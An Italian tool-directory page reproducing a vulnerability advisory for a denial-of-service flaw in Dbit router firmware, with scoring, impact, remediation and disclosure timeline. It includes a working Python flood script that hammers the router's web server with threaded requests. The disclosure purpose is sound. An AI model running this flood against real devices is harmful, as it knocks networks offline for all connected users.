Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-36957 — Proof-of-concept per CVE-2026-36957, una vulnerabilità denial-of-service nel firmware del router Dbit tramite flood HTTP sul web server Boa, che causa esaurimento delle risorse e blocco del sistema. | Kitploit
Strumenti/GitHubGitHub/kirubel-cve/cve-2026-36957
Analisi delle VulnerabilitàExploitSicurezza WebPenetration Testing
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

Proof-of-concept per CVE-2026-36957, una vulnerabilità denial-of-service nel firmware del router Dbit tramite flood HTTP sul web server Boa, che causa esaurimento delle risorse e blocco del sistema.

Vedi Repository
125 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-36957: Denial of Service tramite HTTP Flood sul server web Boa

ID CVE: CVE-2026-36957 Data: 2026-04-29 Scopritore: Kirubel Solomne Vendor: Shenzhen Dibit Network Equipment Co., Ltd. Prodotto: Dbit Router Versione Firmware: V1.0.0 CWE: CWE-400 - Consumo incontrollato di risorse


Descrizione

Il firmware V1.0.0 del router Dbit è vulnerabile a Denial of Service tramite il gestore URI del server web Boa. Inviando un flood ad alto volume di richieste HTTP GET verso URI inesistenti, un attaccante può esaurire risorse critiche di sistema, inclusi i file descriptor e i buffer di memoria. Ciò provoca un deadlock del kernel o un blocco del sistema che disabilita il portale di gestione web e tutte le funzionalità di routing.


Punteggio CVSS

Punteggio CVSS v3.1: 7.5 (Alto) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MetricaValore
Vettore di attaccoRete
Complessità dell'attaccoBassa
Privilegi richiestiNessuno
Interazione utenteNessuna
Impatto sulla riservatezzaNessuno
Impatto sull'integritàNessuno
Impatto sulla disponibilitàAlto

Proof of Concept

import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

Comportamento atteso: Il server dovrebbe limitare le connessioni e rimanere stabile. Comportamento effettivo: L'interfaccia web del router diventa non responsiva; richiede un riavvio manuale.


Impatto

  • Perdita completa dell'interfaccia di gestione web
  • Interruzione di tutte le funzionalità di routing
  • Richiede un riavvio manuale per ripristinare il servizio
  • Tempo di inattività della rete per tutti i dispositivi connessi

Rimedio

  • Implementare il rate limiting delle connessioni sul server web Boa
  • Aggiungere un timer watchdog per il recupero da stati di deadlock
  • Limitare il numero massimo di connessioni simultanee per IP

Cronologia della divulgazione

DataEvento
2026-04-29Vulnerabilità scoperta
2026-04-29Segnalata a MITRE
2026-04-29Assegnato CVE-2026-36957
2026-04-29Divulgazione pubblica

Riferimenti

  • MITRE CVE-2026-36957
  • CWE-400
  • Sito del Vendor
Scarica lo strumento